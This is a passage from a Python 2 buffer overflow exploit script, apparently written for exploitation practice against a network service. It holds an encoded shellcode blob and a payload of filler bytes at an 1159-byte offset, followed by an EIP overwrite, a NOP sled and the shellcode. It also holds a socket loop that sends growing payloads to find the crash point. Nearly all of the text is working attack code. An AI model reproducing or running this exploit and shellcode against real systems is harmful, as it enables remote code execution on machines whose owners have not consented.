shellcode += "\xbd\x8f\x3b\x27\x17\xde\xc4\x84\x56\xee\x36"
shellcode += "\xd4\x9f\xc9\xa8\xa3\xe9\x29\x54\xb4\x2e\x53"
shellcode += "\x82\x31\xb4\xf3\x41\xe1\x10\x05\x85\x74\xd3"
shellcode += "\x09\x62\xf2\xbb\x0d\x75\xd7\xb0\x2a\xfe\xd6"
shellcode += "\x16\xbb\x44\xfd\xb2\xe7\x1f\x9c\xe3\x4d\xf1"
shellcode += "\xa1\xf3\x2d\xae\x07\x78\xc3\xbb\x35\x23\x8c"
shellcode += "\x08\x74\xdb\x4c\x07\x0f\xa8\x7e\x88\xbb\x26"
shellcode += "\x33\x41\x62\xb1\x34\x78\xd2\x2d\xcb\x83\x23"
shellcode += "\x64\x08\xd7\x73\x1e\xb9\x58\x18\xde\x46\x8d"
shellcode += "\x8f\x8e\xe8\x7e\x70\x7e\x49\x2f\x18\x94\x46"
shellcode += "\x10\x38\x97\x8c\x39\xd3\x62\x47\x86\x8c\x7f"
shellcode += "\xb2\x6e\xcf\x7f\x9f\x46\x46\x99\xb5\x86\x0e"
shellcode += "\x32\x22\x3e\x0b\xc8\xd3\xbf\x81\xb5\xd4\x34"
shellcode += "\x26\x4a\x9a\xbc\x43\x58\x4b\x4d\x1e\x02\xda"
shellcode += "\x52\xb4\x2a\x80\xc1\x53\xaa\xcf\xf9\xcb\xfd"
shellcode += "\x98\xcc\x05\x6b\x35\x76\xbc\x89\xc4\xee\x87"
shellcode += "\x09\x13\xd3\x06\x90\xd6\x6f\x2d\x82\x2e\x6f"
shellcode += "\x69\xf6\xfe\x26\x27\xa0\xb8\x90\x89\x1a\x13"
shellcode += "\x4e\x40\xca\xe2\xbc\x53\x8c\xea\xe8\x25\x70"
shellcode += "\x5a\x45\x70\x8f\x53\x01\x74\xe8\x89\xb1\x7b"
shellcode += "\x23\x0a\xc1\x31\x69\x3b\x4a\x9c\xf8\x79\x17"
shellcode += "\x1f\xd7\xbe\x2e\x9c\xdd\x3e\xd5\xbc\x94\x3b"
shellcode += "\x91\x7a\x45\x36\x8a\xee\x69\xe5\xab\x3a"
# DONT FORGET THE NOPS
NOPS = 17 * "\x90"
#PAYLOAD_BUFFER = NOPS + shellcode + ((2080 - len(NOPS+shellcode))*"\x90") + EIP + PADDING
#1161 offset
PAYLOAD_BUFFER = CMD + ("A" * 1159) + END + EIP + NOPS + shellcode
######################################################
# RUN THIS ONCE TO CHECK THAT YOUR LOGIC WORKS
######################################################
try:
if len(sys.argv) == 1:
payload = create_payload(CURRENT_PAYLOAD_SIZE)
send_payload(payload)
elif sys.argv[1] == "loop":
print 'Looping...'
##########################################################
# LOOP AND INCREMENT THE PAYLOAD TO FIND THE CRASH POINT
##########################################################
while True:
payload = create_payload(CURRENT_PAYLOAD_SIZE)
send_payload(payload)
sleep(DELAY)
CURRENT_PAYLOAD_SIZE = CURRENT_PAYLOAD_SIZE + INCREMENT
except IndexError:
pass
except socket.error:
print('Connection Error! Current Payload Size:',CURRENT_PAYLOAD_SIZE)
print sys.exc_info()
except KeyboardInterrupt:
sys.exit()